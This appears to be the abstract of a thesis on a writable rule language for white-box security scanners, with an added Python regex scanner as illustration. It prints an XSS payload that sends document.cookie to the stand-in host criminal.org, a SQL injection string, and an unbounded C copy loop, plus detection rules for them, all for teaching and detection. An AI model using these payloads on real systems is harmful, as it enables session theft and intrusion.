An Ad Hoc Writable Rule Language for White-Box Security Scanners

Author: Sebastian Schinzel
First examiner (Referent): Prof. Dr. Alexander del Pino
Second examiner (Korreferent): Prof. Dr. Alois Schütte

Cross Site Scripting (the victim's cookie is sent to an attacker-controlled host):

    <script>
    document.write('<img src="http://criminal.org/?cookie=' + document.cookie + '">');
    </script>

SQL Injection (the injected OR '1'='1' makes the password check always true):

    SELECT user FROM authentication WHERE username='administrator' AND password='' OR '1'='1'

Buffer Overflow (the copy stops at the source terminator, never at the size of the destination):

    while ('\0' != *src_ptr) {
        *dst_ptr++ = *src_ptr++;
    }

More than two thirds of the German population use the Internet for entertainment, communication, and business purposes. To protect users and service providers from computer crime, data is encrypted, access authorisations are checked, and firewalls are installed to protect applications.

However, the effectiveness of these security mechanisms depends significantly on their correct implementation. If the security mechanisms in an application are flawed, an attacker may be able to circumvent them and cause great damage.

Locating and preventing security vulnerabilities during software development has been a research topic for decades. Facing the fast-growing Internet, security assurance is becoming an integral part of web software development. However, manual security assessments can be complex and expensive. Because of this, tools are developed to automate the search for security vulnerabilities. These tools are called security scanners.

Security scanners can be divided into two groups: white-box scanners can access the internal structure of the target application, such as its source code. Black-box scanners, in contrast, approach the target application solely through its external interfaces; they only have access to the input and output of the target application. Consequently, white-box scanners have much more information about the target application at hand and can search for security vulnerabilities more effectively than black-box scanners.

Many static white-box scanners aim at conducting fully automated security audits. In doing so, the user of the scanner has hardly any possibility to control the internal activities of the scanner. Static white-box scanners often take source code as input, process it, and produce a report about possible security vulnerabilities found in the source code. Customisation of currently existing scanners is difficult or not possible at all. Because of this, the "intelligence" of existing scanners is mostly limited to a fixed rule set.

Thus, the value of such a scanner is limited, even for a security expert. The user hardly gets any information about the patterns the scanner searches for, about where the scanner searched, and about which patterns were omitted during the search.

To make the handling of scanners more comprehensible, I develop a rule language for static white-box scanners in this thesis. This rule language can be used to look for complex source code patterns that may lead to security vulnerabilities. It respects common quality characteristics of programming languages such as maintainability. New rules can be written in an ad hoc manner during a security audit. The rule language enables the user to search for complex patterns in source code and presents the main user interface to the scanner. Furthermore, it is able to support all common programming languages such as C, C++, C#, Java, JavaScript, and ABAP.
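The following is an added illustration of the idea described above, not the rule language developed in the thesis and not code from the author: a minimal white-box scanner whose rules are plain data that an auditor can extend during a review, and whose report also states which rules were applied to each file and which were skipped, so the user is not left guessing what was searched for. The rule format (regular expressions over source text), the rule names, and the sample source files are assumptions made for this example; the samples are constructed to mirror the three snippets on the title page, plus one parameterised query that must not be reported.

```python
"""Minimal rule-driven white-box scanner (illustration only, not the thesis's rule
language). Rules are data an auditor can write ad hoc; the report records which
rules were applied to each file and which were skipped. Rule format, rule names
and sample files are assumptions made for this example."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str          # rule identifier (assumed naming)
    extensions: tuple  # file extensions the rule is applied to
    pattern: str       # regular expression over the raw source text
    message: str       # text for the finding in the report


@dataclass(frozen=True)
class Finding:
    rule: str
    path: str
    line: int
    snippet: str


FLAGS = re.MULTILINE | re.DOTALL

# Ad hoc rules, one per vulnerability class shown on the title page. Plain regular
# expressions stand in for a real rule language here.
RULES = [
    Rule("xss-cookie-exfil", (".js", ".html"),
         r"document\.write\s*\([^;]*document\.cookie",
         "document.cookie flows into document.write() (possible XSS / cookie exfiltration)"),
    Rule("sqli-string-concat", (".java", ".cs", ".js"),
         r"""\b(?:SELECT|INSERT|UPDATE|DELETE)\b[^;]*?['"]\s*\+\s*\w+""",
         "SQL statement built by string concatenation (possible SQL injection)"),
    Rule("c-unbounded-copy", (".c", ".cpp"),
         r"while\s*\(\s*(?:'\\0'\s*!=\s*)?\*\w+\s*\)\s*\{?\s*\*\w+\+\+\s*=\s*\*\w+\+\+",
         "byte-copy loop bounded only by the source terminator (possible buffer overflow)"),
]


def rules_for(path: str, rules: list[Rule]) -> tuple[list[Rule], list[Rule]]:
    """Split the rule set into rules applied to this file and rules skipped for it."""
    ext = path[path.rfind("."):] if "." in path else ""
    applied = [r for r in rules if ext in r.extensions]
    skipped = [r for r in rules if ext not in r.extensions]
    return applied, skipped


def scan_source(path: str, source: str, rules: list[Rule]) -> list[Finding]:
    """Run every given rule over one file and return the matches with line numbers."""
    findings = []
    for rule in rules:
        for m in re.finditer(rule.pattern, source, FLAGS):
            line = source.count("\n", 0, m.start()) + 1
            findings.append(Finding(rule.name, path, line, m.group(0).strip()))
    return findings


def audit(files: dict[str, str], rules: list[Rule] = RULES) -> dict:
    """Scan a set of files; the report also records rule coverage per file."""
    report = {"findings": [], "applied": {}, "skipped": {}}
    for path, source in files.items():
        applied, skipped = rules_for(path, rules)
        report["applied"][path] = [r.name for r in applied]
        report["skipped"][path] = [r.name for r in skipped]
        report["findings"].extend(scan_source(path, source, applied))
    return report


# Constructed sample files (not real project code) mirroring the title-page
# snippets; Auth.java also contains a parameterised query that must NOT match.
SAMPLE_FILES = {
    "login.js": (
        "function leak() {\n"
        "  document.write('<img src=\"http://criminal.org/?cookie=' + document.cookie + '\">');\n"
        "}\n"
    ),
    "Auth.java": (
        "String q = \"SELECT user FROM authentication WHERE username='\" + name\n"
        "         + \"' AND password='\" + pw + \"'\";\n"
        "PreparedStatement ps = conn.prepareStatement(\n"
        "    \"SELECT user FROM authentication WHERE username=? AND password=?\");\n"
    ),
    "copy.c": (
        "void copy(char *dst_ptr, const char *src_ptr) {\n"
        "    while ('\\0' != *src_ptr) {\n"
        "        *dst_ptr++ = *src_ptr++;\n"
        "    }\n"
        "}\n"
    ),
}

if __name__ == "__main__":
    # An auditor can extend the rule set on the spot, e.g. with a rule for strcpy().
    ad_hoc = RULES + [Rule("c-strcpy", (".c", ".cpp"), r"\bstrcpy\s*\(", "unbounded strcpy() call")]
    report = audit(SAMPLE_FILES, ad_hoc)
    for f in report["findings"]:
        print(f"{f.path}:{f.line}: [{f.rule}] {f.snippet}")
    for path in SAMPLE_FILES:
        print(f"{path}: applied={report['applied'][path]} skipped={report['skipped'][path]}")
```

Running the module reports one finding per sample file (the parameterised query in Auth.java is not reported) and, for each file, lists the rules that were applied and the rules that were skipped because they do not target that file type. A regular expression is of course a much weaker pattern language than what the abstract calls for (it has no notion of data flow, so it will miss a cookie value that passes through a variable before reaching document.write), which is exactly the gap a purpose-built rule language is meant to close.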